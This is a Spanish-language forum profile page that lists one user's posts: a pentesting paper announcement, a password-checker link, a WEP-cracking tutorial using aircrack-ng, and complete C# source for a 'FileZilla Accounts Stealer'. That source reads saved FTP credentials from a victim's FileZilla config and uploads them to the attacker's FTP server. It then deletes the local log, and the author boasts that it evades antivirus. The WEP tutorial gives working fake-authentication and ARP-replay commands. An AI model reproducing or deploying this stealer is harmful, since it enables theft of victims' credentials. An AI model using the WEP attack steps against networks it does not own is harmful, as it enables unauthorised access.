Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - [C]orrupted[B]yte

Páginas: [1]
1
Penetration Testing I - Introduccion a los Test de Penetracion


Paper introductorio a los test de penetracion, en esta serie de papers se llevara acabo un test de penetracion completo en una red empresarial real, este primer paper es solo introductorio a los conceptos basicos y metodologias actuales con las que se llevan a cabo los test de penetracion en diferentes empresas hoy en dia. Dependiendo del interes de los usuarios se publicaran las siguientes partes de esta serie de papers donde mostrare como se hace un test de penetracion de manera teorica y practica en una red empresarial real.


ÍNDICE


PRESENTACIÓN


INTRODUCCIÓN A LOS TEST DE PENETRACIÓN
¿QUE ES UN TEST DE PENETRACIÓN?
DEFINICIÓN
PRINCIPIOS BÁSICOS DE LA SEGURIDAD
¿QUE SE BUSCA CON LOS TEST DE PENETRACION?
METODOLOGÍAS DE LOS TEST DE PENETRACION

TIPOS DE TEST DE PENETRACIÓN
TEST DE CAJA NEGRA
TEST DE CAJA BLANCA
TEST DE CAJA GRIS

ETAPAS EN LOS TEST DE PENETRACIÓN
ETAPA DE RECONOCIMIENTO Y ENUMERACIÓN
ETAPA DE ANÁLISIS
ETAPA DE EXPLOTACIÓN
ETAPA DE DOCUMENTACIÓN
ETAPA DE HARDENING

CONCLUSIÓN

REFERENCIAS



Descarga:
http://www.mediafire.com/?b8ec9qcviscdd9w

Contraseña:
Backroot.org

2
C# - VB.NET / [SourceCode] FileZilla Accounts Stealer
« en: Marzo 22, 2012, 12:58:26 am »
Hola, aqui les dejo un code que programe hace unos dias, su funcionamiento es basico al ejecutarlo guarda todas las cuentas FTP de filezilla en un documento de texto con el nombre de la maquina victima para diferenciarlos y los manda a tu servidor FTP seguido de eso elimina el fichero y aqui no paso nada XD. Es un codigo muy pequeño y sencillo pero 100% funcional e indetectable a cualquier antivirus o por lo menos hasta donde lo testee.


El codigo esta dividido en 3 clases para que le puedan dar uso por separado como ustedes guste.




Clase principal para la llamada de los metodos de las otras clases:
Código: (csharp) [Seleccionar]
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Net.NetworkInformation;
using System.IO;
using System.Xml;
using System.Threading;


namespace FileZillaStealer
{
    class Stealer
    {
        static void Main(string[] args)
        {
            string sLogs = IPGlobalProperties.GetIPGlobalProperties().HostName +"Logs.txt";
            AccountStealer StealAccounts = new AccountStealer();
            FTP SendAccounts = new FTP();
            StealAccounts.FileZillaAccounts(sLogs);
            SendAccounts.Send("ftp.server.com", "/public_html/", "user", "pass", sLogs);
            System.IO.File.Delete(sLogs);
        }
    }
}


Clase con el metodo sendo para enviar el fichero de texto con las cuentas guardadas:
Código: (csharp) [Seleccionar]
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Net;


namespace FileZillaStealer
{
    class FTP
    {
        public void Send(string sHost, string sDir, string sUser, string sPass, string sFile)
        {
            string ftpHostDirFile = "ftp://" + sHost +sDir +sFile;
            FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.Create(ftpHostDirFile);
            ftp.Credentials = new NetworkCredential(sUser, sPass);
            ftp.KeepAlive = true;
            ftp.UseBinary = true;
            ftp.Method = WebRequestMethods.Ftp.UploadFile;
            FileStream fs = File.OpenRead(sFile);
            byte[] buffer = new byte[fs.Length];
            fs.Read(buffer, 0, buffer.Length);
            fs.Close();
            Stream ftpstream = ftp.GetRequestStream();
            ftpstream.Write(buffer, 0, buffer.Length);
            ftpstream.Close();
        }
    }
}


Clase para el guarado de las cuentas de filezilla en un documento de texto:
Código: (csharp) [Seleccionar]
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Xml;
using System.Runtime.InteropServices;
using Microsoft.VisualBasic;


namespace FileZillaStealer
{
    class AccountStealer
    {
        public void FileZillaAccounts(string sLogsPath)
        {
            XmlDocument xmlAccountsFile = new XmlDocument();
            string sFilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + "\\FileZilla\\recentservers.xml";
            xmlAccountsFile.Load(sFilePath);
            XmlNodeList xmlRecentServers = xmlAccountsFile.GetElementsByTagName("RecentServers");
            XmlNodeList xmlList = ((XmlElement)xmlRecentServers[0]).GetElementsByTagName("Server");
            string sAccount;
            foreach (XmlElement nodo in xmlList)
            {
                XmlNodeList xmlHost = nodo.GetElementsByTagName("Host");
                XmlNodeList xmlPort = nodo.GetElementsByTagName("Port");
                XmlNodeList xmlUser = nodo.GetElementsByTagName("User");
                XmlNodeList xmlPass = nodo.GetElementsByTagName("Pass");
                sAccount = string.Format("Host: {0} Port: {1} User: {2} Pass: {3}", xmlHost[0].InnerText, xmlPort[0].InnerText, xmlUser[0].InnerText, xmlPass[0].InnerText);
                FileStream fsLogs = new FileStream(sLogsPath, FileMode.OpenOrCreate, FileAccess.Write);
                fsLogs.Close();
                StreamWriter swAccount = File.AppendText(sLogsPath);
                swAccount.WriteLine(sAccount);
                swAccount.Close();
            }
        }
}




Aqui les dejo el proyecto en VS2010:


Descarga:
http://www.mediafire.com/?2u2sns4d3rwdple
Contraseña:
Backroot.org


3
Hacking / Descubre en Cuanto Tiempo se Puede Crackear tu Contraseña
« en: Agosto 16, 2011, 01:51:40 am »
Descubre en Cuanto Tiempo se Puede Crackear tu Contraseña



Bueno aqui les dejo esta pagina para que pongan su contraseña y descubran en cuanto tiempo se puede crackear mediante fuerza bruta la mira tarda 5 millones de años =)

Enlace:
http://howsecureismypassword.net/

4
Seguridad Wireless / Crackeando WEP con Ubuntu Lucid Lynx
« en: Mayo 23, 2011, 02:56:03 pm »
Crackeando WEP con Ubuntu Lucid Lynx

Bueno aqui dejo este tuto para los que son ubunteros  ;D :P

Bueno lo principal es instalarse Aircrack-ng y este se encuentra en los repositorios de ubuntu asi que solo lanzamos el siguiente comando en la terminal:

Código: [Seleccionar]
sudo apt-get install aircrack-ng
Antes que nada deben saber que no con todas las tarjetas wi-fi se puede usar el modo monitor, yo usare para este tutorial lo siguiente:

Notebook Toshiba NB255
Tarjeta wireless Atheros AR9285
S.O. Ubuntu Lucid Lynx
Airckrack-ng

Ok. Manos ala obra, una vez instalado aricrack-ng abrimos una terminal y ejecutamos el siguiente comando:

Código: [Seleccionar]
sudo su
Esto para tener permisos de super usuario y poder ejecutar todos los comandos sin ningun problema. Ahora ponemos nuestra tarjeta en modo monitor con el siguiente comando:

Código: [Seleccionar]
airmon-ng start wlan0
Si nuestra tarjeta se pone en modo monitor nos mandara el mensaje de que nuestra tarjeta se encuentra en modo monitor en mon0 (o dependiendo tu tarjeta), y se vera omo muestra la siguiente:



Ahora escaneamos las redes que hay a nuestro alcance con el siguiente comando:

Código: [Seleccionar]
airodump-ng mon0
mon0 es la interfaz que se activo en modo monitor anteriormente y airodump-ng es un de las monerias de aircrack-ng para la captura de datos y especialmente para la captura de IVs o vectores iniciales



En este caso aquí en mi cuarto solo detecta mi router como ven es el INFINITUM0421 que obviamente es del proveedor TELMEX de aqui de México  Sonreir, y aqui tomamos lapiz y papel  Sonrisa y apuntamos lo siguiente:

BSSID
ESSID
CH

BSSID: Basic Service Set IDentifier, es el identificador del punto de acceso al que nos debemos asociar para poder compartir paquetes.
ESSID: Extended Service Set IDentifier, es el nombre de la red o punto de acceso.
CH: Este es el canal en el que trabaja el dispositivo wireless al que accederemos, el estandar IEEE define una separación mínima entre canales de 5 Mhz, por lo que, empezando de 2.412 Ghz. tendremos que :

Canal 01: 2.412 Ghz
Canal 02: 2.417 Ghz.
Canal 03: 2.422 Ghz.
Canal 04: 2.427 Ghz.
Canal 05: 2.432 Ghz.
Canal 06: 2.437 Ghz.
Canal 07: 2.442 Ghz.
Canal 08: 2.447 Ghz.
Canal 09: 2.452 Ghz.
Canal 10: 2.457 Ghz.
Canal 11: 2.462 Ghz.
Canal 12: 2.467 Ghz.
Canal 13: 2.472 Ghz.
Canal 14: 2.484 Ghz.

Una vez que copiamos los datos presionamos ctrl+c para parar el escaneo y ejecutamos el siguiente comando:

Código: [Seleccionar]
airodump-ng -c 1 -w Paquete mon0
Bueno paso a explicar el comando  airodump-ng como ya mencione es una de las monerías de aircrack-ng para captura de datos, el -c 1 es la instrucción que ase que escuche específicamente en el canal 1 y -w Paquete es la instrucción para que escriba los paquetes de información escuchados en el canal 1 independientemente de la red ala que estemos asiendo la auditoria en el archivo Paquete o como lo quieran llamar, se vera algo como la siguiente imagen:



a terminal la dejan trabajando en lo suyo y abrimos otra y ejecutamos de nuevo el comando sudo su para obtener permisos de super usuario, ahora ejecutamos el siguiente comando:

Código: [Seleccionar]
ifconfigNos aparecerá información detallada de nuestra tarjeta de red aquí copiamos nuestra MAC adress que ocuparemos mas adelante, se vera algo asi como esto:



La MAC adress es la que esta subrayada de blanco en la imagen, ahora ejecutamos el siguiente comando:

Código: [Seleccionar]
ifconfig mon0 up
En este momento utilizaremos los datos que anteriormente copiamos que son:
BSSID
ESSID
MAC Adress

Aremos uso de otra monería de la suite Aircrack-ng que es Aireplay-ng que principalmente se usa para la inyección de frames y se pueden usar los siguientes tipos de ataques:

Ataque 0: Desautenticación
Ataque 1: Autenticación falsa
Ataque 2: Selección interactiva del paquete a enviar
Ataque 3: Reinyección de petición ARP
Ataque 4: El "chopchop" de KoreK (predicción de CRC)

nosotros usaremos el 1 de autenticación falsa y lanzaremos el siguiente comando en la terminal:

Código: [Seleccionar]
aireplay-ng -1 0 -a 00:1F:B3:82:2A:F1 -h E8:39:DF:A0:47:F7 -e INFINITUM0421 mon0este comando lo que ase es mandar  peticiones al dispositivo autenticarnos y asociarnos al mismo el -a 00:1F:B3:82:2A:F1 es el BSSID al que se le mandaran las peticiones, -h E8:39:DF:A0:47:F7 es la mac que se asociara al dispositivo (por seguridad pueden cambiar su MAC Adress con MACchanger que tambien se encuentra en los repositorios de ubuntu) y por ultimo el -e INFINITUM0421 es el ESSID al que nos asociaremos, si todo va bien saldra algo como esto:



Una vez que estamos asociados ala red ejecutamos el siguiente comando:

Código: [Seleccionar]
aireplay-ng -3 -b 00:1F:B3:82:2A:F1 -h E8:39:DF:A0:47:F7 mon0Este comando es para el envío de peticiones ARP y generar mas trafico en la red para que así podamos capturar mas datos en el archivo "Paquete" que anteriormente creamos, una vez que ejecutemos este comando se empesaran a enviar las peticiones y rapidamente veremos como aumenta el #DATA en la ventana que dejamos abierta para la captura de paquetes como en la siguiente imagen:




una vez que llegue a 20,000 ejecutamos el siguiente comando:

Código: [Seleccionar]
aircrack-ng -z Paquete-01.cap
Este comando es para desencriptar la calve WEP y despues de 1 0 2 minutos nos mostrara el mensaje KEY FOUND junto con la clave WEP en este caso 05:82:96:02:07 como se muestra en la imagen:



Para conectarnos a la red solo eliminamos los dos puntos ( : ), copiamos y pegamos y listo!!!  Guiñar

Como ven no es muy dificil crackear un clave WEP solo me tomo 13 minutos todo el proceso aunque se puede hacer en mucho menos tiempo

Páginas: [1]